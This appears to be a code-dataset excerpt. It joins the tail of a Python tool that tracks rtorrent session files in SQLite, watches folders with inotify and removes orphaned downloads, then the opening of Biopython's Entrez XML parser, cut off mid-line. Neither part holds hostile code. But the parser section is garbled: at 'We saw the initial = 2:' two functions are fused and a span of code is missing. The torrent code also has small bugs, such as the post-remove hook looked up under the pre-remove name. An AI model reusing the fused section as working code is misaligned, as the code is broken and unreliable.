get_tor_meta(base_torrent_file, args):\n \"return name, tracker, and list of files associated with base_torent_file\"\n tord = bencode.bread(str(base_torrent_file))\n rtord = bencode.bread(str(base_torrent_file) + '.rtorrent')\n try:\n base_dir = Path(rtord['directory']).expanduser().resolve()\n except FileNotFoundError:\n raise rTorFileNotFoundError(\"No data found for: %s\" %\n base_torrent_file.stem)\n single_file_torrent = 'files' not in tord['info']\n name = tord['info']['name']\n if \"announce\" in tord:\n trackerp = urlparse(tord['announce'])\n tracker = trackerp.hostname if trackerp.hostname else trackerp.netloc\n elif \"announce-list\" in tord:\n trackerp = urlparse(tord['announce-list'][0][0])\n tracker = trackerp.hostname if trackerp.hostname else trackerp.netloc\n else:\n tracker = \"No Tracker\"\n # in multi file torrents, rtorrent adds the name to the base_dir already\n if single_file_torrent:\n return name, tracker, [base_dir / name]\n else:\n return name, tracker, [base_dir / Path(*file['path'])\n for file in tord['info']['files']]\n\ndef create_tables(file):\n \"create sqlite db at file, creating subdirectories if necessary\"\n logging.debug(\"Creating database tables and indexes at '%s'.\" % str(file))\n os.makedirs(str(file.parent), exist_ok=True)\n conn = sqlite3.connect(str(file))\n with conn:\n conn.execute('''\n CREATE TABLE torrent_data (\n hash text PRIMARY KEY,\n name text,\n tracker text,\n torrent blob,\n libtorrent blob,\n rtorrent blob\n );''')\n conn.execute('''\n CREATE TABLE session_files (\n hash text NOT NULL,\n file path NOT NULL,\n PRIMARY KEY (hash, file),\n FOREIGN KEY (hash) REFERENCES torrent_data(hash)\n );''')\n conn.execute('''CREATE INDEX sff ON session_files(file);''')\n conn.execute('''CREATE INDEX sfh ON session_files(hash);''')\n conn.commit()\n conn.close()\n\ndef populate_session_tbl(con, sessfldr, no_action, args=None):\n \"populate db with rtorrent session files found in sessfldr\"\n for file in sessfldr.glob('*.torrent'):\n try:\n name, tracker, torfiles = get_tor_meta(file, args)\n except rTorFileNotFoundError:\n logging.warning(\"No data found for hash: %s\" % file.stem)\n continue\n add_new_session_file(con, file, name, tracker, torfiles, no_action,\n args=args, commit=False)\n if not no_action:\n con.commit()\n\ndef add_new_session_file(con, file, name, tracker, tor_files, no_action,\n args=None, commit=True):\n \"add session file found at file with name, tracker, and file list to db\"\n hash = file.stem\n with con:\n c = con.execute('SELECT 1 FROM torrent_data WHERE hash = ?', (hash,))\n if c.fetchall():\n c.close()\n logging.debug(\"Hash already present: %s\" % hash)\n return\n c.close()\n logging.info(\"Adding hash, name, tracker to db: %s, '%s', %s\" %\n (hash, name, tracker))\n tf_str = \"Adding files:\\n%s\" % tabnew_line_join(tor_files)\n if no_action:\n print(tf_str)\n return\n logging.debug(tf_str)\n with con:\n with open(str(file), 'rb') as fd:\n tord = fd.read()\n with open(str(file.with_suffix('.torrent.libtorrent_resume')), 'rb') as fd:\n ltord = fd.read()\n with open(str(file.with_suffix('.torrent.rtorrent')), 'rb') as fd:\n rtord = fd.read()\n con.execute(\"\"\"\n INSERT INTO torrent_data\n (hash, name, tracker, torrent, libtorrent, rtorrent)\n VALUES (?, ?, ?, ?, ?, ?);\n \"\"\", (hash, name, tracker, tord, ltord, rtord))\n con.executemany('INSERT INTO session_files (hash, file) VALUES (?, ?)',\n ((hash, tf) for tf in tor_files))\n if commit:\n con.commit()\n\ndef check_rtorrent_running(sessiondir, force):\n \"check if running, raise if force is False and running.\"\n lock_file = sessiondir / 'rtorrent.lock'\n rt_running = lock_file.exists()\n if not rt_running:\n return True\n if force and rt_running:\n logging.warning(\"Rtorrent is still running, but continuing.\")\n return False\n elif not force and rt_running:\n raise SystemExit(\"Rtorrent is still running. -f to force.\")\n\ndef qfunc_create(con, path, args, queues):\n logging.debug(\"Processing file: %s\" % str(path))\n try:\n hooks_and_add_torrent(con, path, args)\n except rTorFileNotFoundError:\n logging.warning(\"No data found for: %s\" % path.stem)\n queues['retry_create'].append(path)\n\ndef qfunc_retry_create(con, path, args, queues):\n try:\n hooks_and_add_torrent(con, path, args)\n except rTorFileNotFoundError:\n queues['retry_create'].append(path)\n\ndef handle_remove_torrent(con, file, no_action, args=None):\n \"\"\"\n remove torrent associated with session file from db\n\n run rm_file_hook if args.remove is True\n \"\"\"\n hash = file.stem\n try:\n c = con.execute('''SELECT name, tracker, torrent, libtorrent, rtorrent\n FROM torrent_data WHERE hash = ?''', (hash,))\n name, tracker, tor, ltor, rtor = c.fetchall()[0]\n # all files associated with torrent\n c.execute('SELECT file FROM session_files WHERE hash = ?', (hash,))\n torfiles = [x for (x,) in c.fetchall()]\n except IndexError:\n logging.error(\"Hash to remove not in db: %s\" % hash)\n raise rTorEventException(\"Hash to remove not in db: %s\" % hash)\n else:\n logging.info(\"Remove hash, name, tracker from db: %s, '%s', %s\" %\n (hash, name, tracker))\n if args.remove:\n rmfiles = rm_file_hook(con, file, args)\n else:\n rmfiles = []\n finally:\n c.close()\n with con:\n con.execute('DELETE FROM session_files WHERE hash = ?;', (hash,))\n con.execute('DELETE FROM torrent_data WHERE hash = ?;', (hash,))\n con.commit()\n return RmTuple(name, tracker, hash, rmfiles, torfiles, tor, ltor, rtor)\n\ndef rm_file_hook(con, file, args):\n \"\"\"\n remove files associated with session file file from disk.\n\n if args.paths is non-empty, files must be a child of one path\n \"\"\"\n hash = file.stem\n # which files do not have a match\n c = con.execute('''SELECT f.file FROM\n session_files f\n LEFT JOIN session_files s\n ON s.file = f.file AND s.hash <> f.hash\n WHERE s.file IS NULL AND f.hash = ?;''', (hash,))\n rmfiles = [x for (x,) in c.fetchall()\n if not args.paths or any(is_parent(p, x) for p in args.paths)]\n c.execute('SELECT count(*) FROM session_files WHERE hash = ?', (hash,))\n file_count = c.fetchall()[0][0]\n c.close()\n done_rmfiles, rmsize = rm_files(rmfiles, args.no_action, args.paths)\n fmt_str = \"Rm stats for hash %s removed/removable/total/size: %d/%d/%d/%s\"\n if args.no_action:\n print(fmt_str % (hash, len(done_rmfiles), len(rmfiles), file_count,\n human_filesize(rmsize)))\n else:\n logging.info(fmt_str % (hash, len(done_rmfiles), len(rmfiles),\n file_count, human_filesize(rmsize)))\n return(done_rmfiles)\n\ndef remove_missing_hashes(con, sessfldr, no_action, args=None):\n fs_hashes = set(f.stem for f in sessfldr.glob('*.torrent'))\n with con:\n c = con.execute('SELECT DISTINCT hash, name, tracker FROM torrent_data;')\n db_hash_data = {x[0]:x[1:] for x in c.fetchall()}\n c.close()\n rm_hashes = db_hash_data.keys() - fs_hashes\n if not rm_hashes:\n return rm_hashes\n rm_data = [\"%s, '%s', %s\" % t for t in\n sorted([(k, *db_hash_data[k]) for k in rm_hashes],\n key=lambda x: x[1])]\n if no_action:\n print(\"Remove hashes from db:\\n%s\" % tabnew_line_join(rm_data))\n return rm_hashes\n with con:\n logging.info(\"Remove hashes from db:\\n%s\" % tabnew_line_join(rm_data))\n con.executemany('DELETE FROM session_files WHERE hash = ?',\n ((h,) for h in rm_hashes))\n con.executemany('DELETE FROM torrent_data WHERE hash = ?',\n ((h,) for h in rm_hashes))\n return rm_hashes\n\ndef clean_tables(con, no_action, fs_file_set, args=None):\n \"Remove files in db not found on fs.\"\n with con:\n c = con.execute('SELECT DISTINCT file FROM session_files;')\n db_file_set = {x for (x,) in c.fetchall()}\n c.close()\n rmfiles = sorted(db_file_set - fs_file_set)\n with con:\n if rmfiles:\n if no_action:\n print(\"Remove from session:\\n'%s'\" % tabnew_line_join(rmfiles))\n return\n logging.info(\"Remove from session:\\n'%s'\" % tabnew_line_join(rmfiles))\n try:\n if rmfiles:\n c = con.execute(\"DELETE FROM session_files WHERE file IN (%s)\" %\n ', '.join(('?') * len(rmfiles)), rmfiles)\n rmcount = c.rowcount\n c.close()\n else:\n rmcount = 0\n except sqlite3.Error as e:\n logging.exception(\"Error while removing from session_files\")\n\n else:\n logging.debug(\"Removed %d rows from session_files\" % rmcount)\n try:\n hashrm = con.execute(\"\"\"DELETE FROM torrent_data WHERE hash IN\n (SELECT t.hash FROM torrent_data t\n LEFT JOIN session_files s ON s.hash = t.hash\n WHERE s.hash IS NULL);\n \"\"\").rowcount\n except sqlite3.Error as e:\n logging.exception(\"Error removing from torrent_data\")\n hashrm = -1\n logging.info(\"Removed %d rows from torrent_data table\" % hashrm)\n con.commit()\n\ndef rm_files(files, no_action, parent_paths, log_level='debug'):\n \"\"\"\n rm sequence of files and return list of files and total size removed\n\n no_action: just print what would happen\n parent_paths: only remove if the file is in one of the listed parent paths\n log_level: at what level log level to print normal file rm op\n \"\"\"\n logger = getattr(logging, log_level)\n success, rm_size = deque(), 0\n com_par = common_parent(*files)\n for file in files:\n if parent_paths and not any(is_parent(p, file) for p in parent_paths):\n continue\n if no_action:\n print(\"Remove from fs: '%s'\" % str(file))\n success.append(file)\n rm_size += file.stat().st_size\n continue\n try:\n logger(\"Remove from fs: '%s'\" % str(file))\n fsize = file.stat().st_size\n file.unlink()\n except (OSError, IOError) as e:\n logging.exception(\"Could not remove file from fs: '%s'\" % str(file))\n else:\n success.append(file)\n rm_size += fsize\n else:\n if (com_par is not None and not no_action and parent_paths and\n any(is_parent(p, com_par) for p in parent_paths)):\n try:\n com_par.rmdir()\n except (OSError, PermissionError):\n pass\n else:\n logger(\"Removed dir from fs: '%s'\" % str(com_par))\n success.appendleft(com_par)\n return list(success), rm_size\n\ndef remove_orphan_files(con, no_action, fs_file_set, args=None):\n \"remove files on disk not found in db\"\n with con:\n c = con.execute('SELECT DISTINCT file FROM session_files;')\n db_file_set = {x for (x,) in c.fetchall()}\n c.close()\n rm_files(sorted(fs_file_set - db_file_set), no_action, args.paths, 'info')\n\ndef prune_empty_directories(*dirs):\n \"Delete a tree of empty directories, will not delete dirs passed in.\"\n for dir in dirs:\n for d, ds, fs in os.walk(str(dir), topdown=False):\n if d == dir:\n break\n try:\n os.rmdir(d)\n except OSError:\n pass\n else:\n logging.info(\"Removed empty directory: '%s'\" % d)\n\ndef import_user(file):\n \"import a user python file that is not on path as if it were a module\"\n import importlib.machinery\n import importlib.util\n logging.debug(\"Import %s\" % str(file))\n loader = importlib.machinery.SourceFileLoader('hooks', str(file))\n spec = importlib.util.spec_from_loader(loader.name, loader)\n hooks = importlib.util.module_from_spec(spec)\n loader.exec_module(hooks)\n return hooks\n\ndef hooks_and_add_torrent(con, path, args):\n \"handle a new torrent file by running hooks and adding to db\"\n try:\n name, tracker, torfiles = get_tor_meta(path, args)\n except FileNotFoundError:\n return False\n hook = getattr(hooks, 'pre_add', None)\n if hook:\n logging.debug(\"Running pre_add.\")\n hook(con, path, args)\n add_new_session_file(con, path, name, tracker, torfiles, args.no_action,\n args=args)\n hook = getattr(hooks, 'post_add', None)\n if hook:\n logging.debug(\"Running post_add.\")\n hook(con, path, args)\n return True\n\ndef hooks_and_remove_torrent(con, path, args, queues):\n \"\"\"\n handle new removal of a torrent file by running hooks, removing from db\n\n rm files if args.remove is True via rm_file_hook\n \"\"\"\n logging.debug(\"Removed file: %s\" % str(path))\n hook = getattr(hooks, 'pre_remove', None)\n if hook:\n logging.debug(\"Running pre_remove.\")\n hook(con, path, args)\n rmtup = handle_remove_torrent(con, path, args.no_action, args=args)\n hook = getattr(hooks, 'pre_remove', None)\n if hook:\n logging.debug(\"Running post_remove.\")\n hook(con, path, args, rmtup)\n\ndef setup_logging(args):\n formatter = logging.Formatter('%(asctime)s - %(levelname)s: %(message)s')\n rootlog = logging.getLogger()\n loglevel = logging.ERROR - 10 * args.verbose\n rootlog.setLevel(loglevel)\n if not args.quiet and not args.daemon:\n console = logging.StreamHandler()\n console.setFormatter(formatter)\n console.setLevel(loglevel)\n rootlog.addHandler(console)\n if args.log_file:\n logfile = logging.FileHandler(str(args.log_file))\n logfile.setFormatter(formatter)\n logfile.setLevel(loglevel)\n rootlog.addHandler(logfile)\n if args.quiet and not args.log_file:\n rootlog.disabled = True\n\ndef inotify_loop(con, inot, args, queues, qfuncs, inot_funcs):\n \"loop over inotify event generator and dispatch as necessary\"\n for event in inot.event_gen():\n if event is None:\n for key in queues:\n if queues[key]:\n f = queues[key].popleft()\n qfuncs[key](con, f, args, queues)\n break\n else:\n logging.debug(\"Sleeping for %d\" % args.sleep)\n time.sleep(args.sleep) # sleep only when nothing to do\n continue\n header, type_names, watch_path, filename = event\n logging.debug(\"EVENT: %s\" % (event,))\n if filename.lower().endswith('.new'):\n filename = filename[:-4]\n path = Path(watch_path, filename)\n inot_key = (path.suffix[1:], tuple(type_names))\n if inot_key in inot_funcs:\n inot_funcs[inot_key](path)\n\ndef inotify(args):\n \"Setup to run inotify loop\"\n setup_logging(args)\n inot = Inotify()\n inot.add_watch(str(args.session), mask=IN_CREATE ^ IN_DELETE)\n global hooks\n if args.hooks:\n hooks = import_user(args.hooks)\n else:\n hooks = None\n try:\n con = sqlite3.connect(str(args.sql_file),\n detect_types=sqlite3.PARSE_DECLTYPES)\n logging.info(\"Repopulating database.\")\n populate_session_tbl(con, args.session, args.no_action, args=args)\n queues = OrderedDict((('create',deque()),\n ('retry_create',deque()),\n ('remove',deque())))\n qfuncs = {'create':qfunc_create,\n 'retry_create':qfunc_retry_create,\n 'remove':hooks_and_remove_torrent}\n inot_funcs = {('torrent', ('IN_CREATE',)) : queues['create'].append,\n ('torrent', ('IN_DELETE',)) : queues['remove'].append\n }\n complete_hook = getattr(hooks, 'complete', None)\n if complete_hook:\n queues['complete'] = deque()\n inot_funcs[('complete', ('IN_CREATE',))] = queues['complete'].append\n qfuncs['complete'] = complete_hook\n logging.info(\"Entering inotify loop.\")\n preloop_hook = getattr(hooks, 'pre_loop', None)\n if preloop_hook:\n preloop_hook(con, inot, args, queues, qfuncs, inot_funcs)\n queues.move_to_end('remove')\n while True:\n try:\n inotify_loop(con, inot, args, queues, qfuncs, inot_funcs)\n except rTorEventException as e:\n logging.exception(\"Something happened.\")\n except (KeyboardInterrupt, SystemExit):\n logging.info(\"Exiting due to interrupt.\")\n raise\n except Exception:\n logging.exception(\"Unhandled exception.\")\n raise\n finally:\n postloop_hook = getattr(hooks, 'post_loop', None)\n if postloop_hook:\n postloop_hook(con, inot, args)\n inot.remove_watch(bytes(args.session))\n con.close()\n\ndef inotify_withlock(args, lockfile_path):\n try:\n lockfile = open(str(lockfile_path), 'x')\n lockfile.write(str(os.getpid()))\n lockfile.close()\n except FileExistsError:\n logging.error(\"Lock file exists. \"\n \"Check to see if another instance is running. \"\n \"If not, run with --clean-lockfile to remove the stale lockfile.\",\n file=sys.stderr)\n exit(1)\n else:\n inotify(args)\n finally:\n lockfile_path.unlink()\n\ndef clean(args, lockfile_path):\n \"\"\"\n make sure db synced with fs, and fs with db if args.remove is True.\n\n preferably with rtorrent not running\n \"\"\"\n setup_logging(args)\n try:\n lockfile = open(str(lockfile_path), 'x')\n lockfile.write(str(os.getpid()))\n lockfile.close()\n except FileExistsError:\n logging.error(\"Lock file exists. \"\n \"Check to see if another instance is running. \"\n \"If not, run with --clean-lockfile to remove the stale lockfile.\")\n exit(1)\n else:\n con = sqlite3.connect(str(args.sql_file),\n detect_types=sqlite3.PARSE_DECLTYPES)\n check_rtorrent_running(args.session, args.force)\n populate_session_tbl(con, args.session, args.no_action, args=args)\n remove_missing_hashes(con, args.session, args.no_action, args=args)\n fs_file_set = build_fs_file_set(*args.paths)\n clean_tables(con, args.no_action, fs_file_set, args=args)\n if args.remove:\n remove_orphan_files(con, args.no_action, fs_file_set, args=args)\n if not args.no_action:\n prune_empty_directories(*args.paths)\n if not args.no_action:\n logging.debug(\"Vacuum database.\")\n con.execute('VACUUM;')\n con.commit()\n con.close()\n finally:\n lockfile_path.unlink()\n\ndef main(args):\n \"do work depending on args\"\n lockfile_path = PID_FILE\n if args.clean_lockfile and lockfile_path.exists():\n lockfile_path.unlink()\n if args.clean:\n clean(args, lockfile_path)\n elif args.daemon:\n from daemons import daemonizer\n dmn = daemonizer.run(pidfile=str(PID_FILE))(inotify)\n dmn(args)\n else:\n inotify_withlock(args, lockfile_path)\n\n","repo_name":"lostnihilist/rtorrent_event","sub_path":"rtorrent_event/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":30039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24534258986","text":"import sys\nimport os\nimport warnings\nfrom collections import Counter\nfrom xml.parsers import expat\nfrom io import BytesIO\nimport xml.etree.ElementTree as ET\nfrom xml.sax.saxutils import escape\n\n# Importing these functions with leading underscore as not intended for reuse\nfrom Bio._py3k import urlopen as _urlopen\nfrom Bio._py3k import urlparse as _urlparse\nfrom Bio._py3k import unicode\nfrom Bio._py3k import raise_from as _raise_from\n\n\n# The following four classes are used to add a member .attributes to integers,\n# strings, lists, and dictionaries, respectively.\n\n\nclass NoneElement:\n \"\"\"NCBI Entrez XML element mapped to None.\"\"\"\n\n def __init__(self, tag, attributes, key=None):\n \"\"\"Create a NoneElement.\"\"\"\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n\n def __eq__(self, other):\n \"\"\"Define equality with other None objects.\"\"\"\n if other is None:\n return True\n elif other.__eq__(None):\n return True\n else:\n return False\n\n def __ne__(self, other):\n \"\"\"Define non-equality.\"\"\"\n if other is None:\n return False\n elif other.__eq__(None):\n return False\n else:\n return True\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n try:\n attributes = self.attributes\n except AttributeError:\n return \"NoneElement\"\n return \"NoneElement(attributes=%s)\" % repr(attributes)\n\n\nclass IntegerElement(int):\n \"\"\"NCBI Entrez XML element mapped to an integer.\"\"\"\n\n def __new__(cls, value, tag, attributes, key=None):\n \"\"\"Create an IntegerElement.\"\"\"\n self = int.__new__(cls, value)\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n return self\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = int.__repr__(self)\n try:\n attributes = self.attributes\n except AttributeError:\n return text\n return \"IntegerElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n\nclass StringElement(str):\n \"\"\"NCBI Entrez XML element mapped to a string.\"\"\"\n\n def __new__(cls, value, tag, attributes, key=None):\n \"\"\"Create a StringElement.\"\"\"\n self = str.__new__(cls, value)\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n return self\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = str.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"StringElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n\nclass UnicodeElement(unicode):\n \"\"\"NCBI Entrez XML element mapped to a unicode string.\"\"\"\n\n def __new__(cls, value, tag, attributes, key=None):\n \"\"\"Create a UnicodeElement.\"\"\"\n self = unicode.__new__(cls, value)\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n return self\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = unicode.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"UnicodeElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n\nclass ListElement(list):\n \"\"\"NCBI Entrez XML element mapped to a list.\"\"\"\n\n def __init__(self, tag, attributes, allowed_tags, key=None):\n \"\"\"Create a ListElement.\"\"\"\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attributes\n self.allowed_tags = allowed_tags\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = list.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"ListElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n def store(self, value):\n \"\"\"Append an element to the list, checking tags.\"\"\"\n key = value.key\n if self.allowed_tags is not None and key not in self.allowed_tags:\n raise ValueError(\"Unexpected item '%s' in list\" % key)\n self.append(value)\n\n\nclass DictionaryElement(dict):\n \"\"\"NCBI Entrez XML element mapped to a dictionaray.\"\"\"\n\n def __init__(self, tag, attrs, allowed_tags, repeated_tags=None, key=None):\n \"\"\"Create a DictionaryElement.\"\"\"\n self.tag = tag\n if key is None:\n self.key = tag\n else:\n self.key = key\n self.attributes = attrs\n self.allowed_tags = allowed_tags\n self.repeated_tags = repeated_tags\n if repeated_tags:\n for key in repeated_tags:\n self[key] = []\n\n def __repr__(self):\n \"\"\"Return a string representation of the object.\"\"\"\n text = dict.__repr__(self)\n attributes = self.attributes\n if not attributes:\n return text\n return \"DictElement(%s, attributes=%s)\" % (text, repr(attributes))\n\n def store(self, value):\n \"\"\"Add an entry to the dictionary, checking tags.\"\"\"\n key = value.key\n tag = value.tag\n if self.allowed_tags is not None and tag not in self.allowed_tags:\n raise ValueError(\"Unexpected item '%s' in dictionary\" % key)\n if self.repeated_tags and key in self.repeated_tags:\n self[key].append(value)\n else:\n self[key] = value\n\n\nclass NotXMLError(ValueError):\n \"\"\"Failed to parse file as XML.\"\"\"\n\n def __init__(self, message):\n \"\"\"Initialize the class.\"\"\"\n self.msg = message\n\n def __str__(self):\n \"\"\"Return a string summary of the exception.\"\"\"\n return (\n \"Failed to parse the XML data (%s). Please make sure that the input data \"\n \"are in XML format.\" % self.msg\n )\n\n\nclass CorruptedXMLError(ValueError):\n \"\"\"Corrupted XML.\"\"\"\n\n def __init__(self, message):\n \"\"\"Initialize the class.\"\"\"\n self.msg = message\n\n def __str__(self):\n \"\"\"Return a string summary of the exception.\"\"\"\n return (\n \"Failed to parse the XML data (%s). Please make sure that the input data \"\n \"are not corrupted.\" % self.msg\n )\n\n\nclass ValidationError(ValueError):\n \"\"\"XML tag found which was not defined in the DTD.\n\n Validating parsers raise this error if the parser finds a tag in the XML\n that is not defined in the DTD. Non-validating parsers do not raise this\n error. The Bio.Entrez.read and Bio.Entrez.parse functions use validating\n parsers by default (see those functions for more information).\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize the class.\"\"\"\n self.name = name\n\n def __str__(self):\n \"\"\"Return a string summary of the exception.\"\"\"\n return (\n \"Failed to find tag '%s' in the DTD. To skip all tags that \"\n \"are not represented in the DTD, please call Bio.Entrez.read \"\n \"or Bio.Entrez.parse with validate=False.\" % self.name\n )\n\n\nclass DataHandler(object):\n \"\"\"Data handler for parsing NCBI XML from Entrez.\"\"\"\n\n from Bio import Entrez\n\n global_dtd_dir = os.path.join(str(Entrez.__path__[0]), \"DTDs\")\n global_xsd_dir = os.path.join(str(Entrez.__path__[0]), \"XSDs\")\n local_dtd_dir = \"\"\n local_xsd_dir = \"\"\n\n del Entrez\n\n def __init__(self, validate, escape):\n \"\"\"Create a DataHandler object.\"\"\"\n self.dtd_urls = []\n self.element = None\n self.level = 0\n self.data = []\n self.attributes = None\n self.allowed_tags = None\n self.strings = {}\n self.lists = {}\n self.dictionaries = {}\n self.items = set()\n self.errors = set()\n self.validating = validate\n self.parser = expat.ParserCreate(namespace_separator=\" \")\n self.parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)\n self.parser.XmlDeclHandler = self.xmlDeclHandler\n self.schema_namespace = None\n self.namespace_level = Counter()\n self.namespace_prefix = {}\n self._directory = None\n if escape:\n self.characterDataHandler = self.characterDataHandlerEscape\n else:\n self.characterDataHandler = self.characterDataHandlerRaw\n\n def read(self, handle):\n \"\"\"Set up the parser and let it parse the XML results.\"\"\"\n # HACK: remove Bio._py3k handle conversion, since the Entrez XML parser\n # expects binary data\n if handle.__class__.__name__ == \"EvilHandleHack\":\n handle = handle._handle\n if handle.__class__.__name__ == \"TextIOWrapper\":\n handle = handle.buffer\n if hasattr(handle, \"closed\") and handle.closed:\n # Should avoid a possible Segmentation Fault, see:\n # http://bugs.python.org/issue4877\n raise IOError(\"Can't parse a closed handle\")\n if sys.version_info[0] >= 3:\n # Another nasty hack to cope with a unicode StringIO handle\n # since the Entrez XML parser expects binary data (bytes)\n from io import StringIO\n\n if isinstance(handle, StringIO):\n from Bio._py3k import _as_bytes\n\n handle = BytesIO(_as_bytes(handle.read()))\n try:\n self.parser.ParseFile(handle)\n except expat.ExpatError as e:\n if self.parser.StartElementHandler:\n # We saw the initial = 2:\n # Then the first record is finished, while the second record\n # is still a work in progress.\n record = records.pop(0)\n yield record\n\n # We have reached the end of the XML file\n self.parser = None\n if self.element is not None:\n # No more XML data, but there is still some unfinished business\n raise CorruptedXMLError(\"Premature end of XML stream\")\n\n # Send out the remaining records\n for record in records:\n yield record\n\n def xmlDeclHandler(self, version, encoding, standalone):\n \"\"\"Set XML handlers when an XML declaration is found.\"\"\"\n self.parser.StartElementHandler = self.startElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n self.parser.ExternalEntityRefHandler = self.externalEntityRefHandler\n self.parser.StartNamespaceDeclHandler = self.startNamespaceDeclHandler\n self.parser.EndNamespaceDeclHandler = self.endNamespaceDeclHandler\n\n def startNamespaceDeclHandler(self, prefix, uri):\n \"\"\"Handle start of an XML namespace declaration.\"\"\"\n if prefix == \"xsi\":\n # This is an xml schema\n self.schema_namespace = uri\n self.parser.StartElementHandler = self.schemaHandler\n else:\n # Note that the DTD for MathML specifies a default attribute\n # that declares the namespace for each MathML element. This means\n # that MathML element in the XML has an invisible MathML namespace\n # declaration that triggers a call to startNamespaceDeclHandler\n # and endNamespaceDeclHandler. Therefore we need to count how often\n # startNamespaceDeclHandler and endNamespaceDeclHandler were called\n # to find out their first and last invocation for each namespace.\n self.namespace_level[prefix] += 1\n self.namespace_prefix[uri] = prefix\n assert uri == \"http://www.w3.org/1998/Math/MathML\"\n assert prefix == \"mml\"\n\n def endNamespaceDeclHandler(self, prefix):\n \"\"\"Handle end of an XML namespace declaration.\"\"\"\n if prefix != \"xsi\":\n self.namespace_level[prefix] -= 1\n if self.namespace_level[prefix] == 0:\n for key, value in self.namespace_prefix.items():\n if value == prefix:\n break\n else:\n raise RuntimeError(\"Failed to find namespace prefix\")\n del self.namespace_prefix[key]\n\n def schemaHandler(self, name, attrs):\n \"\"\"Process the XML schema (before processing the element).\"\"\"\n key = \"%s noNamespaceSchemaLocation\" % self.schema_namespace\n schema = attrs[key]\n handle = self.open_xsd_file(os.path.basename(schema))\n # if there is no local xsd file grab the url and parse the file\n if not handle:\n handle = _urlopen(schema)\n text = handle.read()\n self.save_xsd_file(os.path.basename(schema), text)\n handle.close()\n self.parse_xsd(ET.fromstring(text))\n else:\n self.parse_xsd(ET.fromstring(handle.read()))\n handle.close()\n # continue handling the element\n self.startElementHandler(name, attrs)\n # reset the element handler\n self.parser.StartElementHandler = self.startElementHandler\n\n def startElementHandler(self, tag, attrs):\n \"\"\"Handle start of an XML element.\"\"\"\n if tag in self.items:\n assert tag == \"Item\"\n name = str(attrs[\"Name\"]) # convert from Unicode\n itemtype = str(attrs[\"Type\"]) # convert from Unicode\n del attrs[\"Type\"]\n if itemtype == \"Structure\":\n del attrs[\"Name\"]\n element = DictionaryElement(\n name, attrs, allowed_tags=None, repeated_tags=None\n )\n parent = self.element\n element.parent = parent\n # For consistency with lists below, store the element here\n if parent is None:\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif name in (\"ArticleIds\", \"History\"):\n del attrs[\"Name\"]\n allowed_tags = None # allowed tags are unknown\n repeated_tags = frozenset([\"pubmed\", \"medline\"])\n element = DictionaryElement(\n tag,\n attrs,\n allowed_tags=allowed_tags,\n repeated_tags=repeated_tags,\n key=name,\n )\n parent = self.element\n element.parent = parent\n # For consistency with lists below, store the element here\n if parent is None:\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif itemtype == \"List\":\n del attrs[\"Name\"]\n allowed_tags = None # allowed tags are unknown\n element = ListElement(tag, attrs, allowed_tags, name)\n parent = self.element\n element.parent = parent\n if self.element is None:\n # Set self.record here to let Entrez.parse iterate over it\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif itemtype == \"Integer\":\n self.parser.EndElementHandler = self.endIntegerElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n self.attributes = attrs\n elif itemtype in (\"String\", \"Unknown\", \"Date\", \"Enumerator\"):\n assert self.attributes is None\n self.attributes = attrs\n self.parser.StartElementHandler = self.startRawElementHandler\n self.parser.EndElementHandler = self.endStringElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n else:\n raise ValueError(\"Unknown item type %s\" % name)\n elif tag in self.errors:\n self.parser.EndElementHandler = self.endErrorElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n elif tag in self.strings:\n self.parser.StartElementHandler = self.startRawElementHandler\n self.parser.EndElementHandler = self.endStringElementHandler\n self.parser.CharacterDataHandler = self.characterDataHandler\n assert self.allowed_tags is None\n self.allowed_tags = self.strings[tag]\n assert self.attributes is None\n self.attributes = attrs\n elif tag in self.dictionaries:\n allowed_tags, repeated_tags = self.dictionaries[tag]\n element = DictionaryElement(tag, attrs, allowed_tags, repeated_tags)\n parent = self.element\n element.parent = parent\n # For consistency with lists below, store the element here\n if parent is None:\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n elif tag in self.lists:\n allowed_tags = self.lists[tag]\n element = ListElement(tag, attrs, allowed_tags)\n parent = self.element\n element.parent = parent\n if parent is None:\n # Set self.record here to let Entrez.parse iterate over it\n self.record = element\n else:\n parent.store(element)\n self.element = element\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n else:\n # Element not found in DTD\n if self.validating:\n raise 